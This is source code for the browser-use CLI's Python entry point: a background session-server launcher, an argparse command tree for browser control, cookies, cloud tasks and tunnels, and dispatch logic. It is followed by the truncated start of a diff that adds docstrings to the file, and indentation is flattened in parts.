cmd.extend(['--profile', profile])
# Set up environment
env = os.environ.copy()
if api_key:
env['BROWSER_USE_API_KEY'] = api_key
# Start server as background process
if sys.platform == 'win32':
# Windows: CREATE_NO_WINDOW prevents console window from appearing
# CREATE_NEW_PROCESS_GROUP allows the process to survive parent exit
subprocess.Popen(
cmd,
env=env,
creationflags=subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
else:
# Unix: use start_new_session
subprocess.Popen(
cmd,
env=env,
start_new_session=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
# Wait for server to be ready (must have PID, lock, and responsive socket)
for _ in range(100): # 5 seconds max
if is_server_running(session) and is_session_locked(session):
try:
sock = connect_to_server(session, timeout=0.5)
sock.close()
# Write metadata file to track session config
meta_path.write_text(
json.dumps(
{
'browser_mode': browser,
'headed': headed,
'profile': profile,
}
)
)
return True
except Exception:
pass
time.sleep(0.05)
print('Error: Failed to start session server', file=sys.stderr)
sys.exit(1)
def send_command(session: str, action: str, params: dict) -> dict:
request = {
'id': f'r{int(time.time() * 1000000) % 1000000}',
'action': action,
'session': session,
'params': params,
}
sock = connect_to_server(session)
try:
# Send request
sock.sendall((json.dumps(request) + '\n').encode())
# Read response
data = b''
while not data.endswith(b'\n'):
chunk = sock.recv(4096)
if not chunk:
break
data += chunk
if not data:
return {'id': request['id'], 'success': False, 'error': 'No response from server'}
return json.loads(data.decode())
finally:
sock.close()
# =============================================================================
# CLI Commands
# =============================================================================
def build_parser() -> argparse.ArgumentParser:
# Import install config to get available modes and default
from browser_use.skill_cli.install_config import get_available_modes, get_default_mode
available_modes = get_available_modes()
default_mode = get_default_mode()
# Build epilog dynamically based on available modes
epilog_parts = []
if 'chromium' in available_modes or 'real' in available_modes:
epilog_parts.append("""Local Mode (default):
browser-use run "Fill the form" # Uses local browser + your API keys
browser-use run "task" --llm gpt-4o # Specify model (requires API key)
browser-use open https://example.com""")
if 'remote' in available_modes:
if 'chromium' in available_modes:
# Full install - show how to switch to remote
epilog_parts.append("""
Remote Mode (--browser remote):
browser-use -b remote run "task" # Cloud execution (US proxy default)
browser-use -b remote run "task" --llm gpt-4o # Specify cloud model
browser-use -b remote --profile <id> run "task" # Use cloud profile
browser-use -b remote run "task" --proxy-country gb # UK proxy
browser-use -b remote run "task" --session-id <id> # Reuse session
browser-use -b remote run "task" --wait # Wait for completion
Task Management:
browser-use task list # List recent cloud tasks
browser-use task status <task-id> # Check task status
browser-use task stop <task-id> # Stop running task""")
else:
# Remote-only install
epilog_parts.append("""
Examples:
browser-use run "task" # Cloud execution (US proxy default)
browser-use run "task" --llm gpt-4o # Specify model
browser-use --profile <id> run "task" # Use cloud profile
browser-use run "task" --proxy-country gb # UK proxy
browser-use run "task" --session-id <id> # Reuse existing session
browser-use run "task" --wait # Wait for completion
Task Management:
browser-use task list # List recent cloud tasks
browser-use task status <task-id> # Check task status
browser-use task stop <task-id> # Stop running task""")
epilog_parts.append("""
Setup:
browser-use install # Install Chromium browser
browser-use init # Generate template file""")
parser = argparse.ArgumentParser(
prog='browser-use',
description='Browser automation CLI for browser-use',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog='\n'.join(epilog_parts),
)
# Global flags
parser.add_argument('--session', '-s', default='default', help='Session name (default: default)')
parser.add_argument(
'--browser',
'-b',
choices=available_modes,
default=default_mode,
help=f'Browser mode (available: {", ".join(available_modes)})',
)
parser.add_argument('--headed', action='store_true', help='Show browser window')
parser.add_argument('--profile', help='Browser profile (local name or cloud ID)')
parser.add_argument('--json', action='store_true', help='Output as JSON')
parser.add_argument('--api-key', help='Browser-Use API key')
parser.add_argument('--mcp', action='store_true', help='Run as MCP server (JSON-RPC via stdin/stdout)')
parser.add_argument('--template', help='Generate template file (use with --output for custom path)')
subparsers = parser.add_subparsers(dest='command', help='Command to execute')
# -------------------------------------------------------------------------
# Setup Commands (handled early, before argparse)
# -------------------------------------------------------------------------
# install
subparsers.add_parser('install', help='Install Chromium browser + system dependencies')
# init
p = subparsers.add_parser('init', help='Generate browser-use template file')
p.add_argument('--template', '-t', help='Template name (interactive if not specified)')
p.add_argument('--output', '-o', help='Output file path')
p.add_argument('--force', '-f', action='store_true', help='Overwrite existing files')
p.add_argument('--list', '-l', action='store_true', help='List available templates')
# setup
p = subparsers.add_parser('setup', help='Configure browser-use for first-time use')
p.add_argument('--mode', choices=['local', 'remote', 'full'], default='local', help='Setup mode (local/remote/full)')
p.add_argument('--api-key', help='Browser-Use API key')
p.add_argument('--yes', '-y', action='store_true', help='Skip interactive prompts')
# doctor
subparsers.add_parser('doctor', help='Check browser-use installation and dependencies')
# -------------------------------------------------------------------------
# Browser Control Commands
# -------------------------------------------------------------------------
# open <url>
p = subparsers.add_parser('open', help='Navigate to URL')
p.add_argument('url', help='URL to navigate to')
# click <index> OR click <x> <y>
p = subparsers.add_parser('click', help='Click element by index or coordinates (x y)')
p.add_argument('args', nargs='+', type=int, help='Element index OR x y coordinates')
# type <text>
p = subparsers.add_parser('type', help='Type text')
p.add_argument('text', help='Text to type')
# input <index> <text>
p = subparsers.add_parser('input', help='Type text into specific element')
p.add_argument('index', type=int, help='Element index')
p.add_argument('text', help='Text to type')
# scroll [up|down]
p = subparsers.add_parser('scroll', help='Scroll page')
p.add_argument('direction', nargs='?', default='down', choices=['up', 'down'], help='Scroll direction')
p.add_argument('--amount', type=int, default=500, help='Scroll amount in pixels')
# back
subparsers.add_parser('back', help='Go back in history')
# screenshot [path]
p = subparsers.add_parser('screenshot', help='Take screenshot')
p.add_argument('path', nargs='?', help='Save path (outputs base64 if not provided)')
p.add_argument('--full', action='store_true', help='Full page screenshot')
# state
subparsers.add_parser('state', help='Get browser state (URL, title, elements)')
# switch <tab>
p = subparsers.add_parser('switch', help='Switch to tab')
p.add_argument('tab', type=int, help='Tab index')
# close-tab [tab]
p = subparsers.add_parser('close-tab', help='Close tab')
p.add_argument('tab', type=int, nargs='?', help='Tab index (current if not specified)')
# keys <keys>
p = subparsers.add_parser('keys', help='Send keyboard keys')
p.add_argument('keys', help='Keys to send (e.g., "Enter", "Control+a")')
# select <index> <value>
p = subparsers.add_parser('select', help='Select dropdown option')
p.add_argument('index', type=int, help='Element index')
p.add_argument('value', help='Value to select')
# eval <js>
p = subparsers.add_parser('eval', help='Execute JavaScript')
p.add_argument('js', help='JavaScript code to execute')
# extract <query>
p = subparsers.add_parser('extract', help='Extract data using LLM')
p.add_argument('query', help='What to extract')
# hover <index>
p = subparsers.add_parser('hover', help='Hover over element')
p.add_argument('index', type=int, help='Element index')
# dblclick <index>
p = subparsers.add_parser('dblclick', help='Double-click element')
p.add_argument('index', type=int, help='Element index')
# rightclick <index>
p = subparsers.add_parser('rightclick', help='Right-click element')
p.add_argument('index', type=int, help='Element index')
# -------------------------------------------------------------------------
# Cookies Commands
# -------------------------------------------------------------------------
cookies_p = subparsers.add_parser('cookies', help='Cookie operations')
cookies_sub = cookies_p.add_subparsers(dest='cookies_command')
# cookies get [--url URL]
p = cookies_sub.add_parser('get', help='Get all cookies')
p.add_argument('--url', help='Filter by URL')
# cookies set <name> <value>
p = cookies_sub.add_parser('set', help='Set a cookie')
p.add_argument('name', help='Cookie name')
p.add_argument('value', help='Cookie value')
p.add_argument('--domain', help='Cookie domain')
p.add_argument('--path', default='/', help='Cookie path')
p.add_argument('--secure', action='store_true', help='Secure cookie')
p.add_argument('--http-only', action='store_true', help='HTTP-only cookie')
p.add_argument('--same-site', choices=['Strict', 'Lax', 'None'], help='SameSite attribute')
p.add_argument('--expires', type=float, help='Expiration timestamp')
# cookies clear [--url URL]
p = cookies_sub.add_parser('clear', help='Clear cookies')
p.add_argument('--url', help='Clear only for URL')
# cookies export <file>
p = cookies_sub.add_parser('export', help='Export cookies to JSON file')
p.add_argument('file', help='Output file path')
p.add_argument('--url', help='Filter by URL')
# cookies import <file>
p = cookies_sub.add_parser('import', help='Import cookies from JSON file')
p.add_argument('file', help='Input file path')
# -------------------------------------------------------------------------
# Wait Commands
# -------------------------------------------------------------------------
wait_p = subparsers.add_parser('wait', help='Wait for conditions')
wait_sub = wait_p.add_subparsers(dest='wait_command')
# wait selector <css>
p = wait_sub.add_parser('selector', help='Wait for CSS selector')
p.add_argument('selector', help='CSS selector')
p.add_argument('--timeout', type=int, default=30000, help='Timeout in ms')
p.add_argument('--state', choices=['attached', 'detached', 'visible', 'hidden'], default='visible', help='Element state')
# wait text <text>
p = wait_sub.add_parser('text', help='Wait for text')
p.add_argument('text', help='Text to wait for')
p.add_argument('--timeout', type=int, default=30000, help='Timeout in ms')
# -------------------------------------------------------------------------
# Get Commands (info retrieval)
# -------------------------------------------------------------------------
get_p = subparsers.add_parser('get', help='Get information')
get_sub = get_p.add_subparsers(dest='get_command')
# get title
get_sub.add_parser('title', help='Get page title')
# get html [--selector SELECTOR]
p = get_sub.add_parser('html', help='Get page HTML')
p.add_argument('--selector', help='CSS selector to scope HTML')
# get text <index>
p = get_sub.add_parser('text', help='Get element text')
p.add_argument('index', type=int, help='Element index')
# get value <index>
p = get_sub.add_parser('value', help='Get input element value')
p.add_argument('index', type=int, help='Element index')
# get attributes <index>
p = get_sub.add_parser('attributes', help='Get element attributes')
p.add_argument('index', type=int, help='Element index')
# get bbox <index>
p = get_sub.add_parser('bbox', help='Get element bounding box')
p.add_argument('index', type=int, help='Element index')
# -------------------------------------------------------------------------
# Python Execution
# -------------------------------------------------------------------------
p = subparsers.add_parser('python', help='Execute Python code')
p.add_argument('code', nargs='?', help='Python code to execute')
p.add_argument('--file', '-f', help='Execute Python file')
p.add_argument('--reset', action='store_true', help='Reset Python namespace')
p.add_argument('--vars', action='store_true', help='Show defined variables')
# -------------------------------------------------------------------------
# Agent Tasks
# -------------------------------------------------------------------------
from browser_use.skill_cli.install_config import is_mode_available
remote_available = is_mode_available('remote')
local_available = is_mode_available('chromium')
p = subparsers.add_parser('run', help='Run agent task (requires API key)')
p.add_argument('task', help='Task description')
p.add_argument('--max-steps', type=int, help='Maximum steps')
# Model selection (works both locally and remotely)
p.add_argument('--llm', help='LLM model (gpt-4o, claude-sonnet-4-20250514, gemini-2.0-flash)')
# Cloud-only flags - only show if remote mode is available
if remote_available:
# Add [remote] hint only if both modes are available (--full install)
remote_hint = '[remote] ' if local_available else ''
p.add_argument('--session-id', help=f'{remote_hint}Reuse existing cloud session ID')
p.add_argument('--proxy-country', help=f'{remote_hint}Proxy country code')
p.add_argument('--stream', action='store_true', help=f'{remote_hint}Stream output in real-time')
p.add_argument('--wait', action='store_true', help=f'{remote_hint}Wait for task to complete (default: async)')
p.add_argument('--flash', action='store_true', help=f'{remote_hint}Enable flash mode')
p.add_argument('--keep-alive', action='store_true', help=f'{remote_hint}Keep session alive after task')
p.add_argument('--thinking', action='store_true', help=f'{remote_hint}Enable extended reasoning')
p.add_argument('--vision', action='store_true', default=None, help=f'{remote_hint}Enable vision')
p.add_argument('--no-vision', action='store_true', help=f'{remote_hint}Disable vision')
# New SDK features
p.add_argument('--start-url', help=f'{remote_hint}URL to start the task from')
p.add_argument('--metadata', action='append', metavar='KEY=VALUE', help=f'{remote_hint}Task metadata (can repeat)')
p.add_argument('--secret', action='append', metavar='KEY=VALUE', help=f'{remote_hint}Task secrets (can repeat)')
p.add_argument(
'--allowed-domain',
action='append',
metavar='DOMAIN',
help=f'{remote_hint}Restrict navigation to domains (can repeat)',
)
p.add_argument('--skill-id', action='append', metavar='ID', help=f'{remote_hint}Enable skill IDs (can repeat)')
p.add_argument('--structured-output', metavar='SCHEMA', help=f'{remote_hint}JSON schema for structured output')
p.add_argument('--judge', action='store_true', help=f'{remote_hint}Enable judge mode')
p.add_argument('--judge-ground-truth', metavar='TEXT', help=f'{remote_hint}Expected answer for judge evaluation')
# -------------------------------------------------------------------------
# Task Management (Cloud) - only available if remote mode is installed
# -------------------------------------------------------------------------
if remote_available:
task_p = subparsers.add_parser('task', help='Manage cloud tasks')
task_sub = task_p.add_subparsers(dest='task_command')
# task list
p = task_sub.add_parser('list', help='List recent tasks')
p.add_argument('--limit', type=int, default=10, help='Maximum number of tasks to list')
p.add_argument('--status', choices=['running', 'finished', 'stopped', 'failed'], help='Filter by status')
p.add_argument('--session', help='Filter by session ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task status <task_id>
p = task_sub.add_parser('status', help='Get task status')
p.add_argument('task_id', help='Task ID')
p.add_argument('--compact', '-c', action='store_true', help='Show all steps with reasoning')
p.add_argument('--verbose', '-v', action='store_true', help='Show all steps with full details (URLs, actions)')
p.add_argument('--last', '-n', type=int, metavar='N', help='Show only the last N steps')
p.add_argument('--reverse', '-r', action='store_true', help='Show steps newest first (100, 99, 98...)')
p.add_argument('--step', '-s', type=int, metavar='N', help='Show specific step number')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task stop <task_id>
p = task_sub.add_parser('stop', help='Stop running task')
p.add_argument('task_id', help='Task ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# task logs <task_id>
p = task_sub.add_parser('logs', help='Get task logs')
p.add_argument('task_id', help='Task ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# -------------------------------------------------------------------------
# Cloud Session Management - only available if remote mode is installed
# -------------------------------------------------------------------------
if remote_available:
session_p = subparsers.add_parser('session', help='Manage cloud sessions')
session_sub = session_p.add_subparsers(dest='session_command')
# session list
p = session_sub.add_parser('list', help='List cloud sessions')
p.add_argument('--limit', type=int, default=10, help='Maximum number of sessions to list')
p.add_argument('--status', choices=['active', 'stopped'], help='Filter by status')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session get <session_id>
p = session_sub.add_parser('get', help='Get session details')
p.add_argument('session_id', help='Session ID')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session stop <session_id> or session stop --all
p = session_sub.add_parser('stop', help='Stop cloud session(s)')
p.add_argument('session_id', nargs='?', help='Session ID (or use --all)')
p.add_argument('--all', action='store_true', help='Stop all active sessions')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session create - Create session without task
p = session_sub.add_parser('create', help='Create a new cloud session')
p.add_argument('--profile', help='Cloud profile ID')
p.add_argument('--proxy-country', help='Proxy country code')
p.add_argument('--start-url', help='Initial URL to navigate to')
p.add_argument('--screen-size', metavar='WxH', help='Screen size (e.g., 1920x1080)')
p.add_argument('--keep-alive', action='store_true', default=None, help='Keep session alive')
p.add_argument('--no-keep-alive', dest='keep_alive', action='store_false', help='Do not keep session alive')
p.add_argument('--persist-memory', action='store_true', default=None, help='Persist memory between tasks')
p.add_argument('--no-persist-memory', dest='persist_memory', action='store_false', help='Do not persist memory')
p.add_argument('--json', action='store_true', help='Output as JSON')
# session share <session_id> - Create or delete public share
p = session_sub.add_parser('share', help='Manage public share URL')
p.add_argument('session_id', help='Session ID')
p.add_argument('--delete', action='store_true', help='Delete the public share')
p.add_argument('--json', action='store_true', help='Output as JSON')
# -------------------------------------------------------------------------
# Tunnel Commands
# -------------------------------------------------------------------------
tunnel_p = subparsers.add_parser('tunnel', help='Expose localhost via Cloudflare tunnel')
tunnel_p.add_argument(
'port_or_subcommand',
nargs='?',
default=None,
help='Port number to tunnel, or subcommand (list, stop)',
)
tunnel_p.add_argument('port_arg', nargs='?', type=int, help='Port number (for stop subcommand)')
tunnel_p.add_argument('--all', action='store_true', help='Stop all tunnels (use with: tunnel stop --all)')
# -------------------------------------------------------------------------
# Session Management
# -------------------------------------------------------------------------
# sessions
subparsers.add_parser('sessions', help='List active sessions')
# close
p = subparsers.add_parser('close', help='Close session')
p.add_argument('--all', action='store_true', help='Close all sessions')
# -------------------------------------------------------------------------
# Server Control
# -------------------------------------------------------------------------
server_p = subparsers.add_parser('server', help='Server control')
server_sub = server_p.add_subparsers(dest='server_command')
server_sub.add_parser('status', help='Check server status')
server_sub.add_parser('stop', help='Stop server')
server_sub.add_parser('logs', help='View server logs')
# -------------------------------------------------------------------------
# Profile Management (mode-aware: use -b real or -b remote)
# -------------------------------------------------------------------------
profile_p = subparsers.add_parser('profile', help='Manage browser profiles (use -b real or -b remote)')
profile_sub = profile_p.add_subparsers(dest='profile_command')
# profile list - lists local or cloud profiles based on -b flag
p = profile_sub.add_parser('list', help='List profiles (local with -b real, cloud with -b remote)')
p.add_argument('--page', type=int, default=1, help='Page number (cloud only)')
p.add_argument('--page-size', type=int, default=20, help='Items per page (cloud only)')
# profile get <id>
p = profile_sub.add_parser('get', help='Get profile details')
p.add_argument('id', help='Profile ID or name')
# profile create (cloud only)
p = profile_sub.add_parser('create', help='Create profile (cloud only)')
p.add_argument('--name', help='Profile name')
# profile update <id> (cloud only)
p = profile_sub.add_parser('update', help='Update profile (cloud only)')
p.add_argument('id', help='Profile ID')
p.add_argument('--name', required=True, help='New profile name')
# profile delete <id> (cloud only)
p = profile_sub.add_parser('delete', help='Delete profile (cloud only)')
p.add_argument('id', help='Profile ID')
# profile cookies <id> - list cookies by domain (local only)
p = profile_sub.add_parser('cookies', help='List cookies by domain (local only, requires -b real)')
p.add_argument('id', help='Profile ID or name (e.g. "Default", "Profile 1")')
# profile sync - sync local profile to cloud
p = profile_sub.add_parser('sync', help='Sync local Chrome profile to cloud')
p.add_argument('--from', dest='from_profile', help='Local profile name (e.g. "Default", "Profile 1")')
p.add_argument('--name', help='Cloud profile name (default: auto-generated)')
p.add_argument('--domain', help='Only sync cookies for this domain (e.g. "youtube.com")')
return parser
def handle_server_command(args: argparse.Namespace) -> int:
    """Handle `server` subcommands: status, stop, logs.

    Returns a process exit code: 0 on success, 1 on failure or when no
    subcommand is given. Stopping an already-stopped server is treated as
    success (idempotent).
    """
    if args.server_command == 'status':
        if is_server_running(args.session):
            print(f'Server for session "{args.session}" is running')
            return 0
        else:
            print(f'Server for session "{args.session}" is not running')
            return 1
    elif args.server_command == 'stop':
        # Not running is not an error: the desired end state already holds.
        if not is_server_running(args.session):
            print(f'Server for session "{args.session}" is not running')
            return 0
        response = send_command(args.session, 'shutdown', {})
        if response.get('success'):
            print(f'Server for session "{args.session}" stopped')
            return 0
        else:
            print(f'Error: {response.get("error")}', file=sys.stderr)
            return 1
    elif args.server_command == 'logs':
        log_path = Path(tempfile.gettempdir()) / f'browser-use-{args.session}.log'
        if log_path.exists():
            print(log_path.read_text())
        else:
            print('No logs found')
        return 0
    # No subcommand given: print usage and fail, consistent with the other
    # command groups (e.g. `task`) instead of silently succeeding.
    print('Usage: browser-use server <command>')
    print('Commands: status, stop, logs')
    return 1
def _parse_key_value_list(items: list[str] | None) -> dict[str, str | None] | None:
if not items:
return None
result: dict[str, str | None] = {}
for item in items:
if '=' in item:
key, value = item.split('=', 1)
result[key] = value
return result if result else None
def _handle_remote_run_with_wait(args: argparse.Namespace) -> int:
    """Create a cloud task and block until it reaches a terminal state.

    The task and session IDs are printed *before* waiting so the user can
    recover them; a Ctrl-C during the wait returns 0 and leaves the remote
    task running. Returns 1 when no task text was given or on any API error.
    """
    import asyncio

    from browser_use.skill_cli.commands import cloud_session, cloud_task

    if not args.task:
        print('Error: No task provided', file=sys.stderr)
        return 1
    try:
        # Handle vision flag (--vision vs --no-vision); None means "use the
        # server-side default" rather than an explicit choice.
        vision: bool | None = None
        if getattr(args, 'vision', False):
            vision = True
        elif getattr(args, 'no_vision', False):
            vision = False
        # Parse key=value list params (None if nothing usable was given)
        metadata = _parse_key_value_list(getattr(args, 'metadata', None))
        secrets = _parse_key_value_list(getattr(args, 'secret', None))
        # Build session params
        session_id = getattr(args, 'session_id', None)
        profile_id = getattr(args, 'profile', None)
        proxy_country = getattr(args, 'proxy_country', None)
        # Create session first if profile or proxy specified and no session_id;
        # an explicit --session-id always wins over profile/proxy flags.
        if (profile_id or proxy_country) and not session_id:
            session = cloud_session.create_session(
                profile_id=profile_id,
                proxy_country=proxy_country,
                keep_alive=getattr(args, 'keep_alive', None),
            )
            session_id = session.id
        # Create task with all cloud-only flags
        task_response = cloud_task.create_task(
            task=args.task,
            llm=args.llm,
            session_id=session_id,
            max_steps=args.max_steps,
            flash_mode=getattr(args, 'flash', None),
            thinking=getattr(args, 'thinking', None),
            vision=vision,
            start_url=getattr(args, 'start_url', None),
            metadata=metadata,
            secrets=secrets,
            allowed_domains=getattr(args, 'allowed_domain', None),
            skill_ids=getattr(args, 'skill_id', None),
            structured_output=getattr(args, 'structured_output', None),
            judge=getattr(args, 'judge', None),
            judge_ground_truth=getattr(args, 'judge_ground_truth', None),
        )
        # Print initial info immediately (recoverable even if interrupted)
        print(f'mode: {args.browser}')
        print(f'task_id: {task_response.id}')
        print(f'session_id: {task_response.session_id}')
        print('waiting...', end='', flush=True)
        # Wait for completion
        try:
            result = asyncio.run(cloud_task.poll_until_complete(task_response.id))
        except KeyboardInterrupt:
            # Interrupt only stops the local wait; the cloud task keeps going.
            print(f'\nInterrupted. Task {task_response.id} continues remotely.')
            return 0
        # Print final result
        print(' done.')
        print(f'status: {result.status}')
        print(f'output: {result.output}')
        if result.cost:
            print(f'cost: {result.cost}')
        return 0
    except Exception as e:
        # Broad catch is deliberate: this is a CLI boundary, any failure
        # becomes a printed error plus exit code 1.
        print(f'Error: {e}', file=sys.stderr)
        return 1
def main() -> int:
    """CLI entry point: parse args, dispatch, return the process exit code.

    Edge cases: no command prints help and returns 0; several command groups
    (server, profile, sessions, close --all, setup, doctor, task, session,
    tunnel) are handled locally without starting the session server; all
    remaining commands are forwarded to the background session server.
    """
    parser = build_parser()
    args = parser.parse_args()
    if not args.command:
        parser.print_help()
        return 0
    # Handle server subcommands without starting server
    if args.command == 'server':
        return handle_server_command(args)
    # Handle profile subcommands without starting server
    if args.command == 'profile':
        from browser_use.skill_cli.commands.profile import handle_profile_command

        return handle_profile_command(args)
    # Handle sessions list - find all running sessions
    if args.command == 'sessions':
        from browser_use.skill_cli.utils import find_all_sessions

        session_names = find_all_sessions()
        sessions = [{'name': name, 'status': 'running'} for name in session_names]
        if args.json:
            print(json.dumps(sessions))
        else:
            if sessions:
                for s in sessions:
                    print(f' {s["name"]}: {s["status"]}')
            else:
                print('No active sessions')
        return 0
    # Handle close --all by closing all running sessions
    if args.command == 'close' and getattr(args, 'all', False):
        from browser_use.skill_cli.utils import find_all_sessions

        session_names = find_all_sessions()
        closed = []
        for name in session_names:
            try:
                response = send_command(name, 'close', {})
                if response.get('success'):
                    closed.append(name)
                    # Clean up metadata file
                    meta_path = get_session_metadata_path(name)
                    if meta_path.exists():
                        meta_path.unlink()
            except Exception:
                pass  # Server may already be stopping
        if args.json:
            print(json.dumps({'closed': closed, 'count': len(closed)}))
        else:
            if closed:
                print(f'Closed {len(closed)} session(s): {", ".join(closed)}')
            else:
                print('No active sessions')
        return 0
    # Handle setup command
    if args.command == 'setup':
        from browser_use.skill_cli.commands import setup

        # NOTE(review): asyncio.get_event_loop() is deprecated when no loop
        # is running on newer Pythons - consider asyncio.run() here.
        loop = asyncio.get_event_loop()
        result = loop.run_until_complete(
            setup.handle(
                'setup',
                {
                    'mode': args.mode,
                    'api_key': args.api_key,
                    'yes': args.yes,
                    'json': args.json,
                },
            )
        )
        if args.json:
            print(json.dumps(result))
        elif 'error' in result:
            print(f'Error: {result["error"]}', file=sys.stderr)
            return 1
        else:
            if result.get('status') == 'success':
                print('\n✓ Setup complete!')
                print(f'\nMode: {result["mode"]}')
                print('Next: browser-use open https://example.com')
        return 0
    # Handle doctor command
    if args.command == 'doctor':
        from browser_use.skill_cli.commands import doctor

        loop = asyncio.get_event_loop()
        result = loop.run_until_complete(doctor.handle())
        if args.json:
            print(json.dumps(result))
        else:
            # Print check results
            checks = result.get('checks', {})
            print('\nDiagnostics:\n')
            for name, check in checks.items():
                status = check.get('status', 'unknown')
                message = check.get('message', '')
                note = check.get('note', '')
                fix = check.get('fix', '')
                if status == 'ok':
                    icon = '✓'
                elif status == 'warning':
                    icon = '⚠'
                elif status == 'missing':
                    icon = '○'
                else:
                    icon = '✗'
                print(f' {icon} {name}: {message}')
                if note:
                    print(f' {note}')
                if fix:
                    print(f' Fix: {fix}')
            print('')
            if result.get('status') == 'healthy':
                print('✓ All checks passed!')
            else:
                print(f'⚠ {result.get("summary", "Some checks need attention")}')
        return 0
    # Handle task command - cloud task management
    if args.command == 'task':
        from browser_use.skill_cli.commands.cloud_task import handle_task_command

        return handle_task_command(args)
    # Handle session command - cloud session management
    if args.command == 'session':
        from browser_use.skill_cli.commands.cloud_session import handle_session_command

        return handle_session_command(args)
    # Handle tunnel command - runs independently of browser session
    if args.command == 'tunnel':
        from browser_use.skill_cli import tunnel

        # First positional is overloaded: a port number OR a subcommand name.
        pos = getattr(args, 'port_or_subcommand', None)
        if pos == 'list':
            result = tunnel.list_tunnels()
        elif pos == 'stop':
            port_arg = getattr(args, 'port_arg', None)
            if getattr(args, 'all', False):
                # stop --all
                result = asyncio.get_event_loop().run_until_complete(tunnel.stop_all_tunnels())
            elif port_arg is not None:
                result = asyncio.get_event_loop().run_until_complete(tunnel.stop_tunnel(port_arg))
            else:
                print('Usage: browser-use tunnel stop <port> | --all', file=sys.stderr)
                return 1
        elif pos is not None:
            try:
                port = int(pos)
            except ValueError:
                print(f'Unknown tunnel subcommand: {pos}', file=sys.stderr)
                return 1
            result = asyncio.get_event_loop().run_until_complete(tunnel.start_tunnel(port))
        else:
            print('Usage: browser-use tunnel <port> | list | stop <port>', file=sys.stderr)
            return 0
        # Output result
        if args.json:
            print(json.dumps(result))
        else:
            if 'error' in result:
                print(f'Error: {result["error"]}', file=sys.stderr)
                return 1
            elif 'url' in result:
                existing = ' (existing)' if result.get('existing') else ''
                print(f'url: {result["url"]}{existing}')
            elif 'tunnels' in result:
                if result['tunnels']:
                    for t in result['tunnels']:
                        print(f' port {t["port"]}: {t["url"]}')
                else:
                    print('No active tunnels')
            elif 'stopped' in result:
                if isinstance(result['stopped'], list):
                    if result['stopped']:
                        print(f'Stopped {len(result["stopped"])} tunnel(s): {", ".join(map(str, result["stopped"]))}')
                    else:
                        print('No tunnels to stop')
                else:
                    print(f'Stopped tunnel on port {result["stopped"]}')
        return 0
    # Validate requested mode is available based on installation config
    from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available

    if not is_mode_available(args.browser):
        print(get_mode_unavailable_error(args.browser), file=sys.stderr)
        return 1
    # Set API key in environment if provided
    if args.api_key:
        os.environ['BROWSER_USE_API_KEY'] = args.api_key
    # Validate API key for remote browser mode upfront
    if args.browser == 'remote':
        from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key

        try:
            api_key = require_api_key('Remote browser')
            # Ensure it's in environment for the cloud client
            os.environ['BROWSER_USE_API_KEY'] = api_key
        except APIKeyRequired as e:
            print(f'Error: {e}', file=sys.stderr)
            return 1
    # Validate --profile flag usage
    if args.profile and args.browser == 'chromium':
        print(
            'Error: --profile is not supported in chromium mode.\n'
            'Use -b real for local Chrome profiles or -b remote for cloud profiles.',
            file=sys.stderr,
        )
        return 1
    # Handle remote run with --wait directly (prints task_id immediately, then waits)
    if args.browser == 'remote' and args.command == 'run' and getattr(args, 'wait', False):
        return _handle_remote_run_with_wait(args)
    # Ensure server is running
    ensure_server(args.session, args.browser, args.headed, args.profile, args.api_key)
    # Build params from args
    params = {}
    skip_keys = {'command', 'session', 'browser', 'headed', 'json', 'api_key', 'server_command'}
    for key, value in vars(args).items():
        if key not in skip_keys and value is not None:
            params[key] = value
    # Add profile to params for commands that need it (agent tasks, etc.)
    # Note: profile is passed to ensure_server for local browser profile,
    # but also needs to be in params for cloud profile ID in remote mode
    if args.profile:
        params['profile'] = args.profile
    # Send command to server
    response = send_command(args.session, args.command, params)
    # Clean up metadata file on successful close
    if args.command == 'close' and response.get('success'):
        meta_path = get_session_metadata_path(args.session)
        if meta_path.exists():
            meta_path.unlink()
    # Output response
    if args.json:
        # Add mode to JSON output for browser-related commands
        if args.command in ('open', 'run', 'state', 'click', 'type', 'input', 'scroll', 'screenshot'):
            response['mode'] = args.browser
        print(json.dumps(response))
    else:
        if response.get('success'):
            data = response.get('data')
            # Show mode for browser-related commands (first line of output)
            if args.command in ('open', 'run'):
                print(f'mode: {args.browser}')
            if data is not None:
                if isinstance(data, dict):
                    # Special case: raw text output (e.g., state command)
                    if '_raw_text' in data:
                        print(data['_raw_text'])
                    else:
                        for key, value in data.items():
                            # Skip internal fields
                            if key.startswith('_'):
                                continue
                            if key == 'screenshot' and len(str(value)) > 100:
                                print(f'{key}: <{len(value)} bytes>')
                            else:
                                print(f'{key}: {value}')
                elif isinstance(data, str):
                    print(data)
                else:
                    print(data)
        else:
            print(f'Error: {response.get("error")}', file=sys.stderr)
            return 1
    return 0
if __name__ == '__main__':
sys.exit(main()) | --- +++ @@ -1,4 +1,10 @@ #!/usr/bin/env python3
+"""Fast CLI for browser-use. STDLIB ONLY - must start in <50ms.
+
+This is the main entry point for the browser-use CLI. It uses only stdlib
+imports to ensure fast startup, delegating heavy operations to the session
+server which loads once and stays running.
+"""
import argparse
import asyncio
@@ -35,6 +41,7 @@
# Helper to find the subcommand (first non-flag argument)
def _get_subcommand() -> str | None:
+ """Get the first non-flag argument (the subcommand)."""
for arg in sys.argv[1:]:
if not arg.startswith('-'):
return arg
@@ -130,6 +137,7 @@
def get_socket_path(session: str) -> str:
+ """Get socket path for session."""
if sys.platform == 'win32':
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
@@ -138,10 +146,16 @@
def get_pid_path(session: str) -> Path:
+ """Get PID file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def _pid_exists(pid: int) -> bool:
+ """Check if a process with given PID exists.
+
